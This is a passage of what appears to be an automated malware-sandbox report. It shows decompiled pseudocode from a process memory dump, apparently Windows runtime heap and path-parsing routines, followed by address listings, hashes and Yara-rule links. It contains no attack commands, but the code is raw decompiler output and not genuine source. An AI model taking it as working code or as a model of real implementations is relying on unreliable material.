							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x36e60e8;
								if( *0x36e60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x36e60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03639710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03636DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0363F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0363F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0363F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0363FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0363FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0363F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0363F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E036C4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0364D130(_t427, _t494, _t511);
				}
			}

0x036c5ba5
0x036c5baa
0x036c5baf
0x036c5bb4
0x036c5bb6
0x036c5bbc
0x036c5bbe
0x036c5bc4
0x036c5bcd
0x036c5bd3
0x036c5bd6
0x036c5bdc
0x036c5be0
0x036c5be3
0x036c5beb
0x036c5bf2
0x036c5bf8
0x036c5bfe
0x036c5c04
0x036c5c0e
0x036c5c18
0x036c5c1f
0x036c5c25
0x036c5c2a
0x036c5c2c
0x036c5c32
0x036c5c3a
0x036c5c3f
0x036c5c42
0x036c5c48
0x036c5c5b
0x036c5c5b
0x036c5c2c
0x036c5cb7
0x036c5cb9
0x036c5cbf
0x036c5cc2
0x036c5cca
0x036c5ccb
0x036c5ccb
0x036c5cd1
0x036c5cd7
0x036c5cda
0x036c5ce1
0x036c5ce4
0x036c5ce7
0x036c5ced
0x036c5cf3
0x036c5cf9
0x036c5cff
0x036c5d08
0x036c5d0a
0x036c5d0e
0x036c5d10
0x00000000
0x00000000
0x036c5d16
0x036c5d1a
0x00000000
0x00000000
0x036c5d20
0x036c5d22
0x036c5d25
0x036c5d2f
0x036c5d2f
0x036c5d33
0x036c5d3d
0x036c5d49
0x036c5d4b
0x00000000
0x00000000
0x036c5d5a
0x036c5d5d
0x036c5d60
0x00000000
0x00000000
0x036c5d66
0x036c5d69
0x00000000
0x00000000
0x036c5d6f
0x036c5d6f
0x036c5d73
0x036c5d79
0x036c5d7f
0x036c5d86
0x036c5d95
0x036c5d98
0x036c5dba
0x036c5dcb
0x036c5dce
0x036c5dd3
0x036c5dd6
0x036c5dd8
0x036c5de6
0x036c5dec
0x036c5dee
0x036c5df1
0x036c5df3
0x036c635a
0x036c635a
0x00000000
0x036c635a
0x036c5dfe
0x036c5e02
0x036c5e05
0x036c5e07
0x036c5e10
0x036c5e13
0x036c5e1b
0x036c5e1c
0x036c5e21
0x036c5e22
0x036c5e23
0x036c5e25
0x036c5e2a
0x036c5e2c
0x036c5e2e
0x036c5e36
0x036c5e39
0x036c5e42
0x036c5e47
0x036c5e4d
0x036c5e54
0x036c5e54
0x036c5e54
0x036c5e2e
0x036c5e5c
0x036c5e5f
0x036c5e62
0x036c5e64
0x036c5e6b
0x036c5e70
0x036c5e7a
0x036c5e7a
0x036c5e7a
0x036c5e6b
0x036c5e7e
0x036c5e7f
0x036c5e7f
0x036c5e81
0x036c5e87
0x036c5e8b
0x036c5e8c
0x036c5e8c
0x036c5e8c
0x036c5e9a
0x036c5e9c
0x036c5ea2
0x036c5ea6
0x036c5f50
0x036c5f50
0x036c5f57
0x036c5f66
0x036c5f66
0x036c5f66
0x036c5f68
0x036c5f6a
0x036c63d0
0x00000000
0x036c5f70
0x036c5f70
0x036c5f91
0x036c5f9c
0x036c5f9e
0x036c5fa4
0x036c5fa6
0x036c638c
0x036c6392
0x036c63a1
0x036c63a7
0x036c63af
0x036c63af
0x036c63bd
0x036c63d8
0x00000000
0x036c63d8
0x036c5fac
0x036c5fb2
0x036c5fb4
0x036c5fbd
0x036c5fc6
0x036c5fce
0x036c5fd4
0x036c5fdc
0x036c5fec
0x036c5fed
0x036c5fee
0x036c5fef
0x036c5ff9
0x036c5ffa
0x036c5ffb
0x036c5ffc
0x036c6000
0x036c6004
0x036c6012
0x036c6012
0x036c6018
0x036c6019
0x036c601a
0x036c601b
0x036c601c
0x036c6020
0x036c6059
0x036c605c
0x036c6061
0x036c6061
0x036c6022
0x036c6022
0x036c6022
0x036c6025
0x036c602a
0x036c602b
0x036c6031
0x036c6037
0x036c6038
0x036c603e
0x036c6048
0x036c6049
0x036c604a
0x036c604b
0x036c604c
0x036c604d
0x036c6053
0x036c6054
0x036c6054
0x036c6062
0x036c6065
0x036c6067
0x036c606a
0x036c6070
0x036c6075
0x036c6076
0x036c6081
0x036c6087
0x036c6095
0x036c6099
0x036c609e
0x036c60a4
0x036c60ae
0x036c60b0
0x036c60b3
0x036c60b6
0x036c60b8
0x036c60ba
0x036c60ba
0x036c60ba
0x036c60ba
0x036c60be
0x036c60c0
0x036c60c5
0x036c60c5
0x036c60c5
0x036c60c6
0x036c60cd
0x036c6114
0x036c60cf
0x036c60cf
0x036c60d4
0x036c60d5
0x036c60da
0x036c60db
0x036c60e1
0x036c60e2
0x036c60e8
0x036c60f8
0x036c60fd
0x036c60fe
0x036c6102
0x036c6104
0x036c6107
0x036c6109
0x036c610b
0x036c610b
0x036c610b
0x036c610b
0x036c610f
0x036c610f
0x036c6117
0x036c611a
0x036c611f
0x036c6125
0x036c6134
0x036c6139
0x036c613f
0x036c6146
0x036c6148
0x036c614b
0x036c614d
0x036c614f
0x036c614f
0x036c614f
0x036c614f
0x036c6153
0x036c6159
0x036c6159
0x036c615c
0x036c6163
0x036c6169
0x036c616c
0x036c6172
0x036c6181
0x036c6186
0x036c6187
0x036c618b
0x036c6191
0x036c6195
0x036c61a3
0x036c61bb
0x036c61c0
0x036c61c3
0x036c61cc
0x036c61d0
0x036c61dc
0x036c61de
0x036c61e1
0x036c61e4
0x036c61e6
0x036c61e8
0x036c61e8
0x036c61e8
0x036c61e8
0x036c61e6
0x036c61ec
0x036c61f3
0x036c6203
0x036c6209
0x036c620a
0x036c6216
0x036c621d
0x036c6227
0x036c6241
0x036c6246
0x036c624c
0x036c6257
0x036c6259
0x036c625c
0x036c625e
0x036c6260
0x036c6260
0x036c6260
0x036c6260
0x036c625e
0x036c6264
0x036c6267
0x036c6269
0x036c6315
0x036c6315
0x036c631b
0x036c631e
0x036c6324
0x036c6327
0x036c632f
0x036c6330
0x036c6333
0x036c633a
0x036c633c
0x036c6335
0x036c6335
0x036c6335
0x036c633f
0x036c6342
0x036c634c
0x036c6352
0x036c6355
0x036c6355
0x036c6359
0x00000000
0x036c626f
0x036c6275
0x036c6275
0x036c6278
0x036c627e
0x036c627e
0x036c6281
0x036c6287
0x036c628d
0x036c6298
0x036c629c
0x036c62a2
0x036c629e
0x036c629e
0x036c629e
0x036c62a7
0x036c62a7
0x036c62aa
0x036c62b0
0x036c62f0
0x036c62f0
0x036c62f2
0x036c62f8
0x036c62fd
0x036c62b2
0x036c62b2
0x036c62b2
0x036c62b5
0x036c62dd
0x036c62e2
0x036c62e5
0x036c62b7
0x036c62b8
0x036c62bb
0x036c62bd
0x036c62c0
0x036c62c4
0x036c62cd
0x036c62cd
0x036c62c0
0x036c62bb
0x036c62b5
0x036c6302
0x036c6303
0x036c6305
0x036c6305
0x036c6305
0x036c630c
0x036c630c
0x00000000
0x036c627e
0x036c6269
0x036c5eac
0x036c5ebb
0x036c5ebe
0x036c5ecb
0x036c5ecb
0x036c5ece
0x036c5ece
0x036c5ed4
0x036c5ed7
0x036c5ed9
0x036c5edb
0x036c5edb
0x036c5ee1
0x036c5ee1
0x036c5ee3
0x036c5f20
0x036c5f20
0x036c5ee5
0x036c5ee5
0x036c5ee5
0x036c5ee8
0x036c5f11
0x036c5f18
0x036c5eea
0x036c5eea
0x036c5eed
0x036c5ef2
0x036c5ef8
0x036c5efb
0x036c5f0a
0x036c5f0a
0x036c5eed
0x036c5ee8
0x036c5f22
0x036c5f28
0x00000000
0x00000000
0x036c5f30
0x036c5f31
0x036c5f37
0x036c5f3a
0x036c5f3d
0x036c5f44
0x00000000
0x00000000
0x00000000
0x036c5f46
0x036c5f48
0x036c5f4d
0x00000000
0x036c5f4d
0x036c5dda
0x036c5ddf
0x00000000
0x036c5ddf
0x036c5dd8
0x036c5da7
0x036c5da9
0x036c5dac
0x036c5dae
0x00000000
0x036c5db4
0x036c5db4
0x00000000
0x036c5db4
0x036c5dae
0x036c5d88
0x036c5d8d
0x036c6363
0x036c6369
0x036c636a
0x036c6370
0x036c6372
0x036c637a
0x036c637b
0x036c637d
0x00000000
0x00000000
0x036c637f
0x036c6385
0x00000000
0x036c6385
0x036c5d38
0x036c5d3b
0x00000000
0x00000000
0x00000000
0x036c5d3b
0x036c5d27
0x036c5d29
0x00000000
0x00000000
0x00000000
0x036c6360
0x00000000
0x036c6360
0x036c5c10
0x036c5c10
0x036c63da
0x036c63e5
0x036c63e5

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9855e820a93a8ea107687c71ec36f300094f6de51704e9a1b93d97830f641f92
Instruction ID: b239eaf0920496578425e145dfa96f75dd1e000b31c50a4432c32ebfd6e38f49
Opcode Fuzzy Hash: 9855e820a93a8ea107687c71ec36f300094f6de51704e9a1b93d97830f641f92
Instruction Fuzzy Hash: F2426875A102698FDB24CF68C980BA9B7B1FF49304F1881AED94DAB342D734A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03614120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E03614120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x36ed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0362F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03616E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03614620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03616E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M036145F8))) {
												case 0:
													_v568 = 0x35d1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x35d11c4;
									}
									L20:
									_v588 = _t163;
